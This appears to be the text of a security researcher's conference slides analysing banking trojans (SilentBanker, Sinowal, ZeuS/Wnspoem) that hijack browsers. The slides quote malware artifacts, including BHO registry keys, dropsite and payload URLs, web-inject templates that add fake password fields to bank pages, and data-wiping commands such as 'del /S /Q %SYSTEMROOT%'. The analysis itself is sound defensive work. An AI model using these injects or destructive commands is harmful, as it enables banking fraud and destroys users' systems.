1. *[ Common Browser Hijacking Methods]
David Barroso
TERENA Meeting, León

2. Agenda
Browser Hijacking
Examples: SilentBanker, Sinowal, Wnspoem
Kill the Operating System
Summary
2

3. Browser
Hijacking

4. Definition
“Browser hijacking is the modification of a web
browser’s settings by malicious code. The term
‘hijacking’ is used as the changes are performed
without the user’s permission” (Wikipedia)
Additionally, the malicious code can modify the
HTML rendered in the browser in order to lure the
user
4

5. Why are they asking for so many data?
5

6. Examples

7. SilentBanker
Date: 2007
Method: Browser Helper Object
Technique: Real time HTML injection and HTML forwarding
Infection: drive-by exploits
Misc: more than 75 mutations
7

8. SilentBanker: Flow Diagram
8

9. SilentBanker: BHO Installation
[HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}]
@="Microsoft Shared Library Object Version"
[HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}InprocServer32]
@="C:WINDOWSsystem32mfc42dx1.dll"
"ThreadingModel"="Apartment"
[HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}ProgID]
@="SharedObject.SharedObjectVersion.1"
[HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}TypeLib]
@="{5F226421-415D-408D-9A09-0DCD94E25B48}"
[HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}VersionIndependentProgID]
@="SharedObject.SharedObjectVersion"
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects
{0000AC13-3487-1583-C4BE-BE6A839DB000}]
9

10. SilentBanker: Configuration File
Get X.Y.67.30/~ipcount/ww6/getcfg.php?
id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=10&v=21&b=6&z=12705442
10

11. SilentBanker: Configuration File
The encrypted configuration file includes:
[dfgdf] • Additional configuration sources
Bg1=X.Y.67.30/~ipcount/ww6/getcfg.php
• Dropsite URL
Bg2=A.B.100.103/ww6/getcfg.php
• Update URL
• Data encryption key
[nbmx]
Bg1=X.Y.67.30/~ipcount/ww6/data.php
Bg2=A.B.100.103/ww6/data.php
[kjew]
Bg1=X.Y.67.30/~ipcount/ww6/file.exe
Bg2=A.B.100.103/ww6/file.exe
[sdfs]
secd=08000000B7B613F1F56F5BC7EDAEDEEFD2ABB1D38B2BA1014A585…
11

12. SilentBanker: Injection Configuration
Get X.Y.67.30/~ipcount/ww6/getcfg.php? Action
pok
id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=20&v=21&b=6&z=12705442
qas Target URL
njd Begin replacement token
dfr Number of characters in njd -1
xzn End replacement token
[jhw18]
xzq Number of characters in xzn -1
pok=insert
rek HTML code injected
qas=passport.yandex.ru/passport
req Number of characters in rek -1
njd=3ECFE0F0EEEBFC3A3C28
dfr=9
insert insert injected HTML code between tokens
xzn=3C2367653E69
delete delete HTML code in xzn
xzq=5
replace replace HTML code in xzn
rek=202020203C676520696E797674612122676263223E0D0A202020203223ECFE
subreq substitute xzn with rek
BE0F2E5E6EDFBE920EFE0F0EEEBFC3A3C2367713E0D0A202020203C6771206
grab extract field in xzn
A767167752122292431222070796E666621227661636867223E0D0A202020203C
766163686720676C63722122636E66666A6265712220616E7A722122636E66666…
req=331
12

13. SilentBanker: Injection Configuration
<ge inyvta!"gbc">
<gq jvqgu!".1"><qvi fglyr!"jvqgu: ($ck;"><oe #><#qvi><#gq>
<gq jvqgu!"%+1" pynff!"ynory">Ïëàòåæíûé ïàðîëü:<#gq>
<gq jvqgu!")$1" pynff!"vachg">
<vachg glcr!"cnffjbeq" anzr!"cnffjq&" inyhr!"" fglyr!"jvqgu:)$1"
gnovaqrk!"&">2aofc;2aofc;<oe#> <#gq>
<gq jvqgu!"&)1"><oe><#gq>
<#ge>
ROT-13 Algorithm
<tr valign="top">
<td width="8%"><div style="width: 40px;"><br /></div></td>
<td width="17%" class="label">Ïëàòåæíûé ïàðîëü:</td>
<td width="50%" class="input">
<input type="password" name="passwd2" value="" style="width:50%" tabindex="2
&nbsp;&nbsp;<br/> </td>
<td width="25%"><br></td>
</tr>
13

14. SilentBanker: Original Webpage
14

15. SilentBanker: Modified Webpage
15

16. Sinowal/Anserin/Torpig
Date: 2005
Method: Code Injection
Technique: Real time HTML injection and HTML forwarding
Infection: drive-by exploits and email
Misc: infects Master Boot Record (MBR) to be stealth
16

17. Sinowal: Injection
Sinowal does not have a configuration file with details about all the injections
Each time the user connects to a specific sites, Sinowal asks its injection
server for instructions
17

18. Sinowal: Injection Example
GET host/Key/EncryptedData
GET host/EFAAC5AEB85FF1D1/
MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1
I want the answer
Tell me the fake This is the targeted encrypted
page path
brand
18

19. Sinowal: Injection Example
Step 3: The injection server looks for the targeted brand:
UK online*.lloydstsb.* /miheld.ibc {www} /uk/lloyds/lloyds.php
204
USA onlineid.bankofamerica.com /cgi-
bin/sso.login.controller* {www}
/usa/bofa_pers/sso.login.php 2 0 3
ES www*.bancopopular.es /Bpemotor {www}
/spain/bancopopular/bancopopular.php 2 0 2
19

20. Sinowal: Injection Example
2: You need a GET of to enabled
5: number
0: Number1: Injection
of visits
This is the fake page injection attempts
the real URL
Step 4: the injection server answers
path
www*.bancopopular.es /Bpemotor
/spain/bancopopular/bancopopular.php 2 0 5 1
20

21. Sinowal: Targeted URLs
HTTP Forwarding • PL: 7
(Web Injects) • AU: 26
• UK: 40 • SK: 5
• DE: 47 • NZ: 8
• US: 65 • NL: 4
• ES: 30 • SG: 2
• IT: 18
• AT: 7
• TR: 44
21

22. Wnspoem/PRG/ZeuS/Ntos
Date: 2006
Method: Code Injection
Technique: Real time HTML injection and HTML forwarding
Infection: drive-by exploits
Version 1 Version 2 Version 3 Version 4
Directory wnspoem sysproc64 twain_32 lowsec
Filename ntos.exe oembios.exe twext.exe sdra64.exe
Stolen data audio.dll sysproc86.sys local.ds local.ds
Configuratio video.dll sysproc32.sys user.ds user.ds
n
22

23. Wnspoem: Famous Screenshots
23

24. Wnspoem: Flow Diagram
24

25. Wnspoem: Hooks
Wsock32.dll (FTP/POP3 capture) Wininet.dll (Capture data, inject
• Send HTML)
• Sendto • HTTPSendRequest
• Closesocket • InternetReadFile
Ws2_32.dll (FTP/POP3) • InternetReadFileEx
• Send • InternetQueryDataAvailable
• Sendto • InternetCloseHandle
• WSASend • HTTPQueryInfo
• WSASendTo Ntdll.dll (Infect processes and hide
• Closesocket files)
User32.dll (Keylogger) • NtCreateThread
• GetMessage • LdrLoadDll
• PeekMesasge • LdrGetProcedureAddress
• GetClipboardData • NtQueryDirectoryFile
Crypt32.dll (Certificates)
• PFXImportCertStore
25

26. Wnspoem: Configuration File
Configuration files in latest wnspoem version uses RC4 and 256-bits keys
set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GP
data_before
name="password"*</td>*</td>
data_end
data_inject
<td align="left" colspan="7" valign="bottom"></td></tr><tr>
<td class="textoHome" align="left">3. Clave de Transferencias</td>
<td width="20"><img src='/img4bog/px.gif' border='0' width="20" height="1"></td>
<td align="left"><input type="password" name="ESpass" maxlength="60" tabindex="3
" class="TextoContenido"></td>
data_end
data_after
data_end
26

27. Wnspoem: Original Webpage
27

28. Wnspoem: Modified Webpage
28

29. Wnspoem: HTTP Forwarding
Some banks use security tokens or more complex 2nd authentication than a
password
In this scenario, HTML injection is avoided, and the user is forwarded to a
fake webpage usually hosted in a compromised site
29

30. Wnspoem: HTTP Forwarding
In the configuration file:
@https://*.barclays.co.uk/*
https://*.barclays.co.uk/*
http://compromisedhost.com/img/commons/barclay/index.ph
p
@https://*.cajasur.es/*
https://*.cajasur.es/*
http://compromisedhost.com/img/commons/cajasur/index.ph
p
30

31. Wnspoem: Fake Webpage
31

32. Wnspoem: Statistics
Analysis and Statistics: Configuration files
750 configuration files (usually cfg.bin) analyzed.
Only wnspoem version 1, 2 and 3
32

33. Wnspoem: Top 10 TLD
33

34. Wnspoem: Targeted Brands
34

35. Wnspoem: Malicious Domains
35

36. Wnspoem: Malicious IP Addresses
36

37. Kill the
Operating
System

38. Kill the Operating System
It is getting more common that just after stealing the credentials, the operating
system is remotely destroyed
This action makes the analysis more difficult, since cannot be done remotely.
The malicious code is not securely deleted in the system and can be
recovered
One optimistic result is that the machine will be reformated with a new and
patched operating system.
38

39. Kill the Operating System
Nethell:
• Deletes NTDETECT.COM and ntldr
InfoStealer:
• Deletes drivers*.sys
• Deletes some registry keys (HKLMMicrosoftWindows
NTCurrentVersionWinlogon: Shell = Explorer.exe
Wnspoem:
• Deletes HKCU, HKLMSoftware and HKLMSystem
Glacial Dracon:
• del /A:S /Q /F C:*.*
• del /S /Q %SYSTEMROOT% %PROGRAMFILES%
39

40. Summary

41. Summary
Browser Hijacking is actively used in fraud schemes
Targeted brands are all around the world
Currently, only Microsoft Windows users are affected (Internet Explorer and
Firefox)
Be suspicious if your browser is asking for too much information
Be more suspicious if your computer stops working just after your browsing is
asking for too much information ☺
41

42. Thanks
David Barroso
S21sec e-crime Director
dbarroso@s21sec.com
http://blog.s21sec.com
lostinsecurity

43. *[ MUCHAS GRACIAS ]
Pág. 43